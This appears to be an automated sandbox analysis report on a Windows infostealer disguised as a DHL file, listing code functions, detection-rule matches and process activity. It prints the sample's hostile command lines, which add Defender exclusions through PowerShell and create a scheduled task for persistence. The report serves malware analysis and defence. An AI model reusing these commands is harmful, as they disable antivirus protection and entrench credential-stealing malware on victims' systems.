                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07111E7A0_2_07111E7A
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071196C80_2_071196C8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07112CF80_2_07112CF8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07110B900_2_07110B90
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071180A00_2_071180A0
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07114F100_2_07114F10
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07114F000_2_07114F00
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07119FBA0_2_07119FBA
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07119FC80_2_07119FC8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07118E400_2_07118E40
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071186980_2_07118698
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071186880_2_07118688
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071196C70_2_071196C7
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07113D080_2_07113D08
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_0711A5700_2_0711A570
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_0711557A0_2_0711557A
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_0711A5600_2_0711A560
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071155880_2_07115588
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071114400_2_07111440
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07112C970_2_07112C97
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07112CAF0_2_07112CAF
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07113CF80_2_07113CF8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07110B3D0_2_07110B3D
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071183580_2_07118358
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071183480_2_07118348
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07110B770_2_07110B77
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071153980_2_07115398
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071153A80_2_071153A8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07118A900_2_07118A90
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07118A800_2_07118A80
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_07113ADA0_2_07113ADA
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071151180_2_07115118
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071151080_2_07115108
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071100070_2_07110007
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071100400_2_07110040
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071180900_2_07118090
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071148B80_2_071148B8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_071118D90_2_071118D9
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E61A80_2_076E61A8
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E47200_2_076E4720
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E47120_2_076E4712
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E41600_2_076E4160
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E41700_2_076E4170
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E9FF10_2_076E9FF1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01174AC010_2_01174AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0117EE7810_2_0117EE78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01173EA810_2_01173EA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_011741F010_2_011741F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D30A810_2_068D30A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068DC19010_2_068DC190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D51E810_2_068D51E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D61F010_2_068D61F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068DAE2010_2_068DAE20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D798010_2_068D7980
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D72A010_2_068D72A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068DE3B010_2_068DE3B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D000610_2_068D0006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D004010_2_068D0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_068D58E710_2_068D58E7
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_0169D40411_2_0169D404
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C80A011_2_076C80A0
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C2CF811_2_076C2CF8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C0B9011_2_076C0B90
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C96C811_2_076C96C8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C1E7A11_2_076C1E7A
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C868811_2_076C8688
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C869811_2_076C8698
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076CA56011_2_076CA560
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076CA57011_2_076CA570
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C834811_2_076C8348
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C835811_2_076C8358
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C004011_2_076C0040
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C000711_2_076C0007
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C809011_2_076C8090
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C4F0011_2_076C4F00
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C4F1011_2_076C4F10
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C8E4011_2_076C8E40
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C2CAF11_2_076C2CAF
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C2C9F11_2_076C2C9F
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C0B7711_2_076C0B77
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C0B3D11_2_076C0B3D
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C8A8011_2_076C8A80
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C8A9011_2_076C8A90
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C96C611_2_076C96C6
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C557811_2_076C5578
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C558811_2_076C5588
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C144011_2_076C1440
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C53A811_2_076C53A8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C539811_2_076C5398
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C510811_2_076C5108
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C511811_2_076C5118
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C9FC811_2_076C9FC8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C9FBA11_2_076C9FBA
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C3D0811_2_076C3D08
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C3CF811_2_076C3CF8
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeCode function: 11_2_076C18D911_2_076C18D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_0127C34716_2_0127C347
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_0127EB7016_2_0127EB70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_01274AC016_2_01274AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_01273EA816_2_01273EA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_012741F016_2_012741F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B2C38016_2_06B2C380
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B2AAE816_2_06B2AAE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4B3F616_2_06B4B3F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B430A816_2_06B430A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4C18816_2_06B4C188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B461F016_2_06B461F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B451E816_2_06B451E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B458E716_2_06B458E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4798016_2_06B47980
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B472A016_2_06B472A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4E3A816_2_06B4E3A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4237A16_2_06B4237A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4004016_2_06B40040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06F733D016_2_06F733D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B4003B16_2_06B4003B
                      Source: DHL_231437894819.bat.exeStatic PE information: invalid certificate
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.0000000003C14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1461903059.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1476095082.0000000006F00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6d090dc9-6d2f-4d1c-bf4e-c434d24d7edf.exe4 vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exe, 00000000.00000000.1379737305.0000000000832000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevFIL.exe. vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1477959036.000000000A510000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1467243677.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6d090dc9-6d2f-4d1c-bf4e-c434d24d7edf.exe4 vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exe, 00000000.00000002.1468443029.00000000045C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exeBinary or memory string: OriginalFilenamevFIL.exe. vs DHL_231437894819.bat.exe
                      Source: DHL_231437894819.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.uvbIwIYe.exe.4b83228.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.uvbIwIYe.exe.4b83228.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.uvbIwIYe.exe.4b47a08.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_231437894819.bat.exe.47c5e40.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.uvbIwIYe.exe.4b47a08.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: DHL_231437894819.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: uvbIwIYe.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, NpXw3kw.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, gyfrCFT5x9I.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_231437894819.bat.exe.478a620.3.raw.unpack, fpnV0Qjz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, OcHrdeaLLWK7BX0qEn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, OcHrdeaLLWK7BX0qEn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, OcHrdeaLLWK7BX0qEn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/15@3/3
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeFile created: C:\Users\user\AppData\Roaming\uvbIwIYe.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeMutant created: \Sessions\1\BaseNamedObjects\OpXSkSSFXYjockGTiz
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1E51.tmpJump to behavior
                      Source: DHL_231437894819.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DHL_231437894819.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DHL_231437894819.bat.exeVirustotal: Detection: 65%
                      Source: DHL_231437894819.bat.exeReversingLabs: Detection: 71%
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeFile read: C:\Users\user\Desktop\DHL_231437894819.bat.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DHL_231437894819.bat.exe "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\uvbIwIYe.exe C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
